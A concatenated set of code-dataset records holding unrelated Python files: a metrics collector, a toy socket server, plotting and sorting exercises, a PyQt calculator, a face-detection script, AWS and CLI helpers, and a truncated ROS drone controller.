tcp_status = None\n period_1 = ''\n period_5 = ''\n period_15 = ''\n symbole = '\\n'\n\n is_forecast = roboter.getConfigVal(\"is_forecast\")\n\n if is_forecast == '':\n is_forecast = 0\n\n if is_forecast == '1':\n cpu_forecast = {}\n cpu_forecast = {\"dimension\": \"CPU_FORECAST\", \"kpi_id\": \"9011\", \"value\": json.dumps(get_cpu_forecast())}\n\n # cpu_utilization = 'CPUUtilization ' + str(timestamp) + ' ' + str(cpu) + ' Percent CPU\\n'\n cpu_utilization = {\"dimension\": \"CPU\", \"kpi_id\": \"9001\", \"value\": str(cpu)}\n # cpu_user = {\"dimension\":\"AvgUser\",\"name\":\"CPUDetail\",\"value\":\"20\"}\n # cpu_sys = {\"dimension\":\"AvgSystem\",\"name\":\"CPUDetail\",\"value\":\"10\"}\n # memory_utilization 
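`merge_with` above calls `d2.iteritems()`, which was removed in Python 3; there it raises AttributeError the first time two samples are merged. A corrected sketch with identical behavior:

```python
import operator

# Same element-wise subtraction of tuple values, but iterating with .items(),
# which exists on both Python 2 and Python 3 dicts.
def merge_with(d1, d2, fn=lambda x, y: tuple(map(operator.sub, x, y))):
    res = d1.copy()
    for key, val in d2.items():
        try:
            res[key] = fn(res[key], val)
        except KeyError:
            res[key] = val
    return res
```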
= 'MemoryUtilization ' + str(timestamp) + ' ' + str(mem[0]) + ' Percent Memory\\n'\n memory_utilization = {\"dimension\": \"Memory\", \"kpi_id\": \"9002\", \"value\": str(mem[0])}\n # memory_total = {\"dimension\":\"MemoryTotal\",\"name\":\"MemoryDetail\",\"value\":str(mem[2]),\"unit\":\"GB\"}\n # memory_use = {\"dimension\":\"MemoryConsts\",\"name\":\"MemoryDetail\",\"value\":str(mem[3]),\"unit\":\"GB\"}\n if load:\n # period_1 = 'LoadAverage ' + str(timestamp) + ' ' + str(load[0]) + ' count 1min\\n'\n # period_5 = 'LoadAverage ' + str(timestamp) + ' ' + str(load[1]) + ' count 5min\\n'\n # period_15 = 'LoadAverage ' + str(timestamp) + ' ' + str(load[2]) + ' count 15min\\n'\n period_1_temp = {\"dimension\": \"1min\", \"kpi_id\": \"9004\", \"value\": str(load[0])}\n period_1 = json.dumps(period_1_temp) + ','\n period_5_temp = {\"dimension\": \"5min\", \"kpi_id\": \"9004\", \"value\": str(load[1])}\n period_5 = json.dumps(period_5_temp) + ','\n period_15_temp = {\"dimension\": \"15min\", \"kpi_id\": \"9004\", \"value\": str(load[2])}\n period_15 = json.dumps(period_15_temp) + ','\n if disk:\n for name, value in disk.items():\n disk_tmp = {\"kpi_id\": \"9003\", \"dimension\": name, \"value\": str(value[0])}\n disk_utilization = disk_utilization + json.dumps(disk_tmp) + ','\n\n if disk_io:\n for name, value in disk_io.items():\n disk_io_read_tmp = {\"kpi_id\": \"9005\", \"dimension\": name, \"value\": str(round(float(value[0]) / 1024, 2))}\n disk_io_write_tmp = {\"kpi_id\": \"9006\", \"dimension\": name, \"value\": str(round(float(value[1]) / 1024, 2))}\n disk_io_read = disk_io_read + json.dumps(disk_io_read_tmp) + ','\n disk_io_write = disk_io_write + json.dumps(disk_io_write_tmp) + ','\n if net:\n for name, value in net.items():\n internet_networkrx_tmp = {\"kpi_id\": \"9007\", \"dimension\": name,\n \"value\": str(round(float(value[0]) / 1024, 2))}\n internet_networktx_tmp = {\"kpi_id\": \"9008\", \"dimension\": name,\n \"value\": str(round(float(value[1]) / 1024, 2))}\n internet_networkrx = internet_networkrx + json.dumps(internet_networkrx_tmp) + ','\n internet_networktx = internet_networktx + json.dumps(internet_networktx_tmp) + ','\n\n if tcp_status:\n status_count = tcp_status.split()\n for element in status_count:\n key_value = element.split('=')\n tcp_status_count_tmp = {\"kpi_id\": \"9009\", \"dimension\": key_value[0], \"value\": key_value[1]}\n tcp_status_count = tcp_status_count + json.dumps(tcp_status_count_tmp) + ','\n\n # process_count = 'ProcessCount ' + str(timestamp) + ' ' + process_number + ' Count Process\\n'\n process_count = {\"kpi_id\": \"9010\", \"dimension\": \"Process\", \"value\": process_number}\n data_post = json.dumps(cpu_utilization) + ',\\n' + json.dumps(\n memory_utilization) + ',\\n' + period_1 + symbole + period_5 + symbole + period_15 + symbole + disk_utilization + symbole + disk_io_read + symbole + disk_io_write + symbole + internet_networkrx + symbole + internet_networktx + symbole + tcp_status_count + symbole + json.dumps(\n process_count)\n\n instanceid = roboter.getNodeIp()\n nodeCode = roboter.getNodeId()\n headers = {\"content_Type\": \"text/plain\", \"Accept\": \"text/plain\", \"hold\": \"300\", \"node_Code\": nodeCode,\n \"instance_Id\": instanceid, \"group\": \"Decoding\", \"time\": str(timestamp)}\n\n header = '''{\"header\":''' + json.dumps(headers) + ''',\"content\":['''\n\n roboter.setContent(header + data_post + ''']}''')\n\n\nif __name__ == '__main__':\n\n if not os.path.exists(\"../tmp\"):\n os.mkdir(\"../tmp\")\n\n 
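`collector` above assembles the JSON body by concatenating `json.dumps` fragments with hand-placed commas and newlines; whenever a section is empty (no load data, `tcp_status` is always None here) the result can contain stray separators and stop being valid JSON. A hedged sketch of the usual alternative, collecting dicts and serializing once; the field names mirror the ones used above:

```python
import json

# Build the content as a list of dicts, then serialize the whole envelope once.
content = [
    {"dimension": "CPU", "kpi_id": "9001", "value": "12"},
    {"dimension": "Memory", "kpi_id": "9002", "value": "41.3"},
]
payload = {"header": {"group": "Decoding"}, "content": content}
body = json.dumps(payload)  # always well-formed, regardless of empty sections
```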
collector()","sub_path":"com/asiainfo/aihc/host_metrics.py","file_name":"host_metrics.py","file_ext":"py","file_size_in_byte":14830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"208706755","text":"# Servidor básico em python para escutar porta 80 \n#\n# 7eAo1200000010173XXXXIIIIIIIIIXXXX7E\n#\n\n\nimport socket\n\nHOST = ''\nPORT = 81 # porta que escuta http\n\ndef sendHTTP(msg):\n resp = ('HTTP/1.1 404 OK\\r\\n'\n 'Content-Type: text/html\\r\\n'\n 'Connection: Close\\r\\n' \n '\\r\\n' \n '\\r\\n '+msg+'

</h1>'\n        '<h2>' + msg + '</h2>'\n        '</body></html>'\n        '
\\r\\n\\r\\n')\n return resp \n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: \n s.bind((HOST,PORT))\n s.listen(1)\n while True:\n conn, addr = s.accept()\n print('Endereco '+ str(addr)+ '\\n')\n while True:\n data = conn.recv(1024) # recebe os dados da conexao \n\n if not data: # se nao tem mais dados termina \n break\n\n print('recebendo os dados \\n') \n print(data.decode())\n msg = sendHTTP('OK')\n conn.send(msg.encode())\n # conn.close() \n break\n conn.close() ","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"60217231","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 13 16:48:48 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nplt.xkcd()\r\nx=np.linspace(0,20,40)\r\ny1=x**2+1\r\nplt.figure(figsize=(4,4))\r\nplt.plot(x,y1,color='b')\r\nplt.figure()\r\ny2=x**3\r\nplt.plot(x,y2,color='g')\r\nplt.figure()\r\nplt.plot(x,y1)\r\nplt.plot(x,y2)\r\nplt.xlim(0,10)\r\nplt.ylim(0,100)\r\nplt.xlabel('X',fontsize=14)\r\nplt.ylabel('Y',fontsize=14)\r\nplt.xticks(np.linspace(0,10,5))","sub_path":"matplotlib/matplotlib_2_plot.py","file_name":"matplotlib_2_plot.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"556228374","text":"#! /usr/bin/env python3\r\n# -*- Coding:utf-8 -*-\r\n\r\nclass dict(dict):\r\n\r\n \r\n def _remove_value(self,value):\r\n return remove_value(self,value)\r\n \r\n def _remove_key(self,key):\r\n self=remove_key(self.key)\r\n pass\r\n\r\ndef remove_value(dic,values):\r\n\r\n if values==None:\r\n\r\n return {_key:dic[_key] for _key in dic if dic[_key] != values}\r\n else:\r\n\r\n return {_key:dic[_key] for _key in dic if dic[_key]not in set(values)}\r\n\r\n\r\ndef remove_key(dic,keys):\r\n\r\n if keys==None:\r\n\r\n return {_key:dic[_key] for _key in dic if _key != keys}\r\n else:\r\n\r\n return {_key:dic[_key] for _key in dic if _key not in set(keys)}\r\n\r\nif __name__=='__main__':\r\n d=dict({0:'a',1:None,2:None,3:'d', None:'a', None:None})\r\n\r\n #d=remove_value(d,None)\r\n print(d)\r\n print(d._remove_value(None).values())\r\n\r\n print(remove_value(d,None))\r\n\r\n print(remove_key(d,None))","sub_path":"minghu6/algs/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"121832789","text":"''' When you write the configuration file the ordering is very much important '''\nfrom layout_code_2 import DrawPanel\n\n#no common property here\n\n'''name space region context label '''\npanel_code = DrawPanel('object_light','PROPERTIES','WINDOW','object','Object Light')\npanel_code.set_file_name('properties_object_light.py')\n\n''' each property consists of five parts - context, name, type, do_implement, label'''\n\nproperties = []\n\n''' common properties '''\n\nproperties.append(['scene','ml_enable','bool',False,'Enable Meshlight'])\nproperties.append(['scene','bgp_enable','bool',False,'Enable Bgportallight'])\nproperties.append(['scene','vol_enable','bool',False,'Enable Volume'])\n\npanel_code.add_properties(properties)\n\npanel_code.add_enum('ml_enable', 'True', ['scene','ml_color','color',False,'Meshlight Color'])\npanel_code.add_enum('ml_enable', 'True', 
['scene','ml_power','float',False,'Power'])\npanel_code.add_enum('ml_enable', 'True', ['scene','ml_samples','int',False,'Samples'])\npanel_code.add_enum('ml_enable', 'True', ['scene','ml_double_sided','bool',False,'Double Sided'])\n\npanel_code.add_enum('bgp_enable', 'True', ['scene','bgp_power','float',False,'Power'])\npanel_code.add_enum('bgp_enable', 'True', ['scene','bgp_samples','int',False,'Samples'])\npanel_code.add_enum('bgp_enable', 'True', ['scene','bgp_with_caustic','bool',False,'With Caustic'])\npanel_code.add_enum('bgp_enable', 'True', ['scene','bgp_with_diffuse','bool',False,'With Diffuse'])\npanel_code.add_enum('bgp_enable', 'True', ['scene','bgp_photon_only','bool',False,'Photons Only'])\n\n\npanel_code.add_enum('vol_enable', 'True', ['scene','vol_region','enum',False,'Volume Region'])\npanel_code.add_enum('vol_enable', 'True', ['scene','vol_absorp','float',False,'Absroption'])\npanel_code.add_enum('vol_enable', 'True', ['scene','vol_scatter','float',False,'Scatter'])\n\npanel_code.add_enum_values('vol_region',['ExpDensity Volume','Noise Volume', 'Uniform Volume'])\n\npanel_code.add_enum('vol_region', 'ExpDensity Volume', ['scene','vol_height','float',False,'Height'])\npanel_code.add_enum('vol_region', 'ExpDensity Volume', ['scene','vol_steepness','float',False,'Steepness'])\n\npanel_code.add_enum('vol_region', 'Noise Volume', ['scene','vol_sharpness','float',False,'Sharpness'])\npanel_code.add_enum('vol_region', 'Noise Volume', ['scene','vol_cover','float',False,'Cover'])\npanel_code.add_enum('vol_region', 'Noise Volume', ['scene','vol_density','float',False,'Density'])\n\n'''other settings '''\n#panel_code.add_additional_poll_text('context.scene.render')\npanel_code.poll_unreg_module.append('properties_object')\n\npanel_code.generate_code(20)\n","sub_path":"conf_files/meshlight_conf.py","file_name":"meshlight_conf.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"145020150","text":"import boto3\n\nboto3.setup_default_session(profile_name='rm_profile')\nclient = boto3.client('ssm')\n\n\ndef get_secret(key):\n resp = client.get_parameter(\n Name=key,\n WithDecryption=False\n )\n return resp['Parameter']['Value']\n\n\ncmx_username = get_secret('client_id')","sub_path":"python/aws_boto_get_ssm_param.py","file_name":"aws_boto_get_ssm_param.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"548394117","text":"def my_function():\n x = int(input(\"What is the maximal length of the triangle side? 
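On the boto3 SSM snippet above: `get_parameter` with `WithDecryption=False` returns SecureString parameters still encrypted, so a helper named `get_secret` almost certainly wants `WithDecryption=True` (plain String parameters ignore the flag). A minimal sketch:

```python
import boto3

client = boto3.client('ssm')

def get_secret(key):
    # SecureString values are only decrypted when WithDecryption=True.
    resp = client.get_parameter(Name=key, WithDecryption=True)
    return resp['Parameter']['Value']
```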
Enter a number: \"))\n solutions = []\n for x in range(5, x):\n for y in range(4, x):\n for z in range(3, x):\n if (x * x == y * y + z * z):\n solutions.append([x, y, z])\n m = 0\n for solution in solutions:\n if m < max(solution):\n m = max(solution)\n return m\n\n\nprint(my_function())","sub_path":"your-code/challenge3-solution.py","file_name":"challenge3-solution.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"382514138","text":"\"\"\"\nIn a binary tree, the root node is at depth 0, and children of each depth k node are at depth k+1.\n\nTwo nodes of a binary tree are cousins if they have the same depth, but have different parents.\n\nWe are given the root of a binary tree with unique values, and the values x and y of two different nodes in the tree.\n\nReturn true if and only if the nodes corresponding to the values x and y are cousins.\n\nExample 1:\n Input: root = [1,2,3,4], x = 4, y = 3\n Output: false\n\nExample 2:\n Input: root = [1,2,3,null,4,null,5], x = 5, y = 4\n Output: true\n\nExample 3:\n Input: root = [1,2,3,null,4], x = 2, y = 3\n Output: false\n\nNote:\n The number of nodes in the tree will be between 2 and 100.\n Each node has a unique integer value from 1 to 100.\n\"\"\"\n\nfrom binarytree import build\n\ndef isCousins(root, x, y):\n def dfs(root, x, y, d):\n if root == None:\n return None\n if root.value == x:\n return [d, None]\n if root.value == y:\n return [None, d]\n\n temp_d_list = [None, None]\n children = [root.left, root.right]\n for child in children:\n if child:\n d_list = dfs(child, x, y, d + 1)\n if d_list == True:\n return True\n elif d_list == False:\n return False\n elif d_list != [None, None]:\n for i in range(2):\n if d_list[i] != None:\n temp_d_list[i] = d_list[i]\n\n if temp_d_list[0] != None and temp_d_list[1] != None:\n if temp_d_list[0] == temp_d_list[1] and temp_d_list[0] != d + 1:\n return True\n else:\n return False\n else:\n return temp_d_list\n\n if dfs(root, x, y, 0) == True:\n return True\n else:\n return False\n\n\nroot1 = build([1,2,3,4])\nx1 = 4\ny1 = 3\nprint(root1)\nprint(isCousins(root1, x1, y1))\n\nroot2 = build([1,2,3,None,4,None,5])\nx2 = 5\ny2 = 4\nprint(root2)\nprint(isCousins(root2, x2, y2))\n\nroot3 = build([1, 2, 3, None, 4])\nx3 = 2\ny3 = 3\nprint(root3)\nprint(isCousins(root3, x3, y3))\n\nroot4 = build([1,2,None,3,4,None,None,5])\nprint(root4)\nx4 = 2\ny4 = 4\nprint(isCousins(root1, x4, y4))\n\n\n","sub_path":"LeetCode-Python/993 Cousins in Binary Tree.py","file_name":"993 Cousins in Binary Tree.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"212398669","text":"import glob\nimport json\nimport os\nfrom collections import OrderedDict\n\n\nclass LedgerRestMetrics():\n\n def __init__(self, dataset, boundaries):\n [abs_min_ts, abs_max_ts] = boundaries\n\n duration = abs_max_ts-abs_min_ts+1\n\n timestamps = [float(x) for x in dataset.keys()]\n\n seconds = [int(x / 1e3) for x in timestamps]\n\n averaged_dataset = {}\n\n for second in seconds:\n a = second*1e3\n b = (1+second)*1e3\n\n dic = list(filter(lambda x:(x >= a and x <= b), timestamps))\n\n stash = {\n 'createTransactionLatency': 0,\n 'forwardTransferLatency': 0,\n }\n\n for di in dic:\n item = dataset[str(int(di))]\n stash['createTransactionLatency'] = (stash['createTransactionLatency'] + item['createTransactionLatency']) / 2\n stash['forwardTransferLatency'] = 
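The cousins solution above threads a two-slot depth list through a DFS, which is hard to follow. An equivalent single-pass BFS that records each target's parent and depth reads more directly; this is a hedged alternative, assuming the same binarytree-style nodes with .left/.right/.value used in the snippet:

```python
from collections import deque

def is_cousins_bfs(root, x, y):
    # Record (parent, depth) for each target value in one traversal.
    found = {}
    queue = deque([(root, None, 0)])
    while queue:
        node, parent, depth = queue.popleft()
        if node.value in (x, y):
            found[node.value] = (parent, depth)
        for child in (node.left, node.right):
            if child:
                queue.append((child, node, depth + 1))
    (px, dx), (py, dy) = found[x], found[y]
    # Cousins: same depth, different parents.
    return dx == dy and px is not py
```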
(stash['forwardTransferLatency'] + item['forwardTransferLatency']) / 2\n\n averaged_dataset[str(second)] = stash\n\n averaged_dataset = OrderedDict(sorted(averaged_dataset.items()))\n\n prev_item = None\n for second in reversed(seconds):\n item = averaged_dataset[str(second)]\n if prev_item and item['createTransactionLatency'] == 0 and item['forwardTransferLatency'] == 0:\n averaged_dataset[str(second)] = prev_item\n prev_item = item\n\n if not averaged_dataset:\n raise AssertionError(\"ledger-rest metrics empty\")\n\n min_ts = int(min(averaged_dataset.keys()))\n max_ts = int(max(averaged_dataset.keys()))\n\n if abs_min_ts < min_ts:\n for i in range(abs_min_ts, min_ts, 1):\n averaged_dataset[str(i)] = averaged_dataset[str(min_ts)]\n if abs_max_ts > max_ts:\n for i in range(max_ts, abs_max_ts, 1):\n averaged_dataset[str(i+1)] = averaged_dataset[str(max_ts)]\n if len(averaged_dataset) != duration:\n for i in range(abs_min_ts, abs_max_ts, 1):\n if not str(i) in averaged_dataset:\n averaged_dataset[str(i)] = averaged_dataset[str(i-1)]\n\n self.dataset = averaged_dataset\n\n def get_metric(self, metric):\n result = {}\n for ts, data in self.dataset.items():\n result[int(ts)] = int(data[metric])\n return result\n","sub_path":"scripts/metrics/ledger_rest.py","file_name":"ledger_rest.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"292117946","text":"import sys\nfrom operation import *\nfrom pushbutton import PushButton\nfrom PyQt5.QtGui import QKeyEvent\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (QWidget, QGridLayout,\n QApplication, QLineEdit)\n\n\nclass Calculator(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n grid = QGridLayout()\n self.setLayout(grid)\n self.screen = QLineEdit()\n self.bottom = []\n self.text = ''\n\n # 按钮和位置初始化\n names = ['clear',\n '7', '8', '9', '/',\n '4', '5', '6', '*',\n '1', '2', '3', '-',\n '0', '.', '=', '+']\n positions = [(i+1,j) for i in range(4) for j in range(4)]\n positions = [(0, 3)] + positions\n\n grid.setSpacing(10)\n\n grid.addWidget(self.screen, 0, 0, 1, 3)\n for position, name in zip(positions,names):\n locals()['btn_' + name] = PushButton(name, self)\n locals()['btn_' + name].clicked.connect(self.buttonClicked)\n self.bottom.append(locals()['btn_' + name])\n grid.addWidget(locals()['btn_' + name], *position)\n\n self.move(300, 150)\n self.setWindowTitle('Calculator by RoyD')\n self.show()\n\n def buttonClicked(self):\n sender = self.sender()\n if sender.text() == '=':\n self.output()\n else:\n if sender.text() == 'clear':\n self.text = ''\n else:\n self.text += sender.text()\n self.screen.setText(self.text)\n\n def keyPressEvent(self, event):\n keyEvent = QKeyEvent(event)\n if keyEvent.key() == Qt.Key_Escape: # Enter键无效,Escape可以表示触发\n #if keyEvent.key() == Qt.Key_Enter:\n self.output()\n\n def output(self):\n self.text = str_proc(self.text)\n self.screen.setText(str(operation(self.text)))\n self.text = ''\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Calculator()\n sys.exit(app.exec_())\n","sub_path":"test/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"331140134","text":"import aozora\nimport pandas\n\n\ndef test_aozora_request():\n expect = pandas.DataFrame([\n {'term': 'し', 'info1': '動詞', 'info2': '自立', 'freq': 100},\n {'term': 
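A caveat on the ledger-rest averaging above: folding samples with `(acc + x) / 2` weights the first sample by 2^-(n-1), so it computes an exponentially decaying average rather than the arithmetic mean the variable names suggest. If a true per-second mean is intended, keep a count:

```python
# Arithmetic mean instead of the chained (acc + x) / 2 fold.
def running_mean(values):
    total, count = 0.0, 0
    for v in values:
        total += v
        count += 1
    return total / count if count else 0.0

assert running_mean([1, 2, 3]) == 2.0  # the chained fold gives an order-dependent value
```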
'こと', 'info1': '名詞', 'info2': '非自立', 'freq': 93},\n ])\n\n a = aozora.AozoraTokenize()\n text = a.request(\n 'https://www.aozora.gr.jp/cards/001428/files/50328_64360.html')\n text = a.extract(text)\n actual = a.freq(text).head(2).reset_index(drop=True)\n\n print(expect)\n print(actual)\n\n pandas.util.testing.assert_frame_equal(expect, actual)\n","sub_path":"tests/test_aozora.py","file_name":"test_aozora.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"329763390","text":"import pickle as cloudpickle\n\nfrom .scanner_type import ScannerType\n\nclass RootExpression(ScannerType):\n \"\"\"\n Collects from an assign context.\n Example\n\n x = FLOR_METRIC('x', e ) ... where e is an arbitrary root expression\n\n \"\"\"\n\n def __init__(self, name, file_path, class_ctx, func_ctx, prev_lsn, tuple_idx):\n \"\"\"\n\n :param file_path: file path of pre-annotated source where the highlight appears\n :param class_ctx: if func_ctx is a method, class to which the method belongs\n :param func_ctx: the function or root context (e.g. None) where this highlight appears.\n a.k.a. the context of the prev_lsn\n :param prev_lsn: The lsn of the log statement that statically immediately precedes the highlight\n the purpose is to narrow the scope of search and limit possibility of ambiguities\n :param follow_lsn: The lsn from which we want to extract data\n \"\"\"\n super().__init__(name, file_path, class_ctx, func_ctx, prev_lsn)\n self.tuple_idx = tuple_idx\n\n #State\n\n\n def consume_data(self, log_record, trailing_ctx, contexts):\n if trailing_ctx is not None and trailing_ctx.is_enabled(self):\n if log_record['lsn'] == self.prev_lsn:\n self.prev_lsn_enabled = True\n elif self.prev_lsn_enabled and log_record['lsn'] == self.follow_lsn:\n # Consume data from an assign context\n root_expressions = list(map(lambda d: {list(d.keys()).pop():\n cloudpickle.loads(eval(list(d.values()).pop()))} ,\n log_record['locals']))\n self.prev_lsn_enabled = False\n if self.tuple_idx is None:\n assert len(root_expressions) == 1\n return root_expressions.pop()\n else:\n return root_expressions[self.tuple_idx]\n","sub_path":"flor/log_scanner/state_machines/root_expression.py","file_name":"root_expression.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"238011081","text":"### helper function\ndef merge(a, b):\n c = []\n a_indx, b_indx = 0, 0\n while a_indx < len(a) and b_indx < len(b):\n if a[a_indx] < b[b_indx]:\n c.append(a[a_indx])\n a_indx += 1\n else:\n c.append(b[b_indx])\n b_indx += 1\n if a_indx == len(a):\n c.extend(b[b_indx:])\n else:\n c.extend(a[a_indx:])\n return c\n\ndef merge_sort(a):\n if len(a) <= 1:\n return a\n\n left, right = merge_sort(a[:len(a)//2]), merge_sort(a[len(a)//2:])\n\n return merge(left, right)\n\n\n# STRETCH: implement an in-place merge sort algorithm\ndef merge_in_place(arr, start, mid, end):\n # TO-DO\n\n return arr\n\ndef merge_sort_in_place(arr, l, r): \n # TO-DO\n\n return arr\n\n\n# TO-DO: implement the Quick Sort function below USING RECURSION\ndef quick_sort( arr):\n if len(arr) <= 1:\n return arr\n \n smaller, equal, larger = [], [], []\n pivot = arr[len(arr)-1]\n\n for number in arr:\n if number < pivot:\n smaller.append(number)\n elif number > pivot:\n larger.append(number)\n else:\n equal.append(number)\n \n return quick_sort(smaller)+equal+quick_sort(larger)\n\nprint(quick_sort([1, 5, 8, 4, 2, 
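The two STRETCH stubs above are left as TO-DO. One common fill, hedged as a sketch rather than the intended solution: an insertion-style in-place merge (O(n^2) worst case, O(1) extra space) plus the usual recursive driver:

```python
def merge_in_place(arr, start, mid, end):
    # Merge sorted runs arr[start..mid] and arr[mid+1..end] by shifting.
    left, right = start, mid + 1
    while left <= mid and right <= end:
        if arr[left] <= arr[right]:
            left += 1
        else:
            value = arr[right]
            arr[left + 1:right + 1] = arr[left:right]  # shift left run right
            arr[left] = value
            left += 1
            mid += 1
            right += 1
    return arr

def merge_sort_in_place(arr, l, r):
    if l < r:
        m = (l + r) // 2
        merge_sort_in_place(arr, l, m)
        merge_sort_in_place(arr, m + 1, r)
        merge_in_place(arr, l, m, r)
    return arr

assert merge_sort_in_place([5, 2, 4, 1, 3], 0, 4) == [1, 2, 3, 4, 5]
```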
9, -6, 0, -3, 7]))\n\n# STRETCH: implement the Timsort function below\n# hint: check out https://github.com/python/cpython/blob/master/Objects/listsort.txt\ndef timsort( arr ):\n\n return arr\n","sub_path":"project/recursive_sorting.py","file_name":"recursive_sorting.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"30964802","text":"import cv2\nimport label_image\nimport os \nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' \n\nsize = 4\n\n\nclassifier = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')\ncap = cv2.VideoCapture(0) \n\nwhile True:\n (ret, im) = cap.read()\n im=cv2.flip(im,1,0)\n\n mini = cv2.resize(im, (int(im.shape[1]/size), int(im.shape[0]/size)))\n\n # detect MultiScale / faces \n faces = classifier.detectMultiScale(mini)\n\n \n for f in faces:\n (x, y, w, h) = [v * size for v in f] #Scale the shapesize backup\n cv2.rectangle(im, (x,y), (x+w,y+h), (0,255,0), 4)\n \n cropped_face = im[y:y+h, x:x+w] # Draw rectangles around each face\n\n faceFile = \"test.jpg\" #Saving the current image from the webcam for testing.\n cv2.imwrite(faceFile, cropped_face)\n \n text = label_image.main(faceFile)# Gets result from the label_image file, i.e. customer is satisfied or not\n text = text.title()\n font = cv2.FONT_HERSHEY_TRIPLEX\n cv2.putText(im, text,(x+w,y), font, 1, (0,0,255), 2)\n\n # Show the image\n cv2.imshow('frame', im)\n key = cv2.waitKey(15)\n # if Esc key is press then break out of the loop \n if key == 27: #Esc key\n break\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"cs_analyzer.py","file_name":"cs_analyzer.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503214665","text":"#\n# Copyright 2014-2015 Boundary, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom boundary import AlarmModify\n\n\nclass AlarmUpdate(AlarmModify):\n def __init__(self):\n AlarmModify.__init__(self, True)\n self.alarm_id = None\n self.method = \"PUT\"\n\n self.cli_description = \"Creates a new metric definition in an Boundary account\"\n\n def addArguments(self):\n\n self.parser.add_argument('-i', '--alarm-id', dest='alarm_id', action='store', required=True,\n metavar='alarm_id', help='Id of the alarm to update')\n self.parser.add_argument('-n', '--alarm-name', dest='alarm_name', action='store',\n metavar='alarm_name', help='Name of the alarm')\n\n AlarmModify.addArguments(self)\n\n def getArguments(self):\n \"\"\"\n Extracts the specific arguments of this CLI\n \"\"\"\n\n AlarmModify.getArguments(self)\n\n if self.args.alarm_id is not None:\n self.alarm_id = self.args.alarm_id\n\n self.path = \"v1/alarm/{0}\".format(self.alarm_id)\n\n def getDescription(self):\n return 'Updates an alarm definition in an Boundary 
account'\n","sub_path":"boundary/alarm_update.py","file_name":"alarm_update.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"176848680","text":"import rospy\nfrom std_msgs.msg import Empty\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import JointState, Image\nfrom Intro_Robotics_Final_Project.msg import DroneCommand, TaggedImage, DroneMovementCommand\nfrom Globals import Globals as G\nimport time\n\n#This class deals with interactions between a single drone\n'''\nOverall: Working good, could eliminate camera joint sub, and should tweak\nthe intensity for drone movements. But note that intensity is limited to -1,1\n'''\nclass DroneController:\n pre_land = Twist()\n pre_land.linear.z = -1 #Can maybe increase this\n\n post_takeoff = Twist()\n post_takeoff.linear.z = -0.1\n last_image_time = 0.0\n\n frame_count = 0\n\n # Amount to move forward\n linear_x_movement_amount = 0.5\n linear_y_movement_amount = 0.2\n angle_rotate_amount = 0.3\n\n #Initializes object with pubs and subs for speciic namespace\n def __init__(self, namespace='/bebop'):\n self.ID = namespace\n #Pubs\n self.pilot_pub = rospy.Publisher(namespace + '/cmd_vel', Twist, queue_size=1)\n self.takeoff_pub = rospy.Publisher(namespace + '/takeoff', Empty, queue_size=1)\n self.land_pub = rospy.Publisher(namespace + '/land', Empty, queue_size=1)\n self.calibrate_pub = rospy.Publisher(namespace + '/flattrim', Empty, queue_size=1)#NOTE: Flat trim might have problems\n self.emergency_pub = rospy.Publisher(namespace + '/reset', Empty, queue_size=1)\n\n self.camera_joint_pub = rospy.Publisher(namespace + '/camera_control', Twist, queue_size=1)\n self.camera_image_pub = rospy.Publisher('/swarm/drone_image', TaggedImage, queue_size=1)\n\n #Subs\n self.pilot_sub = rospy.Subscriber('/swarm/drone_command', DroneMovementCommand, 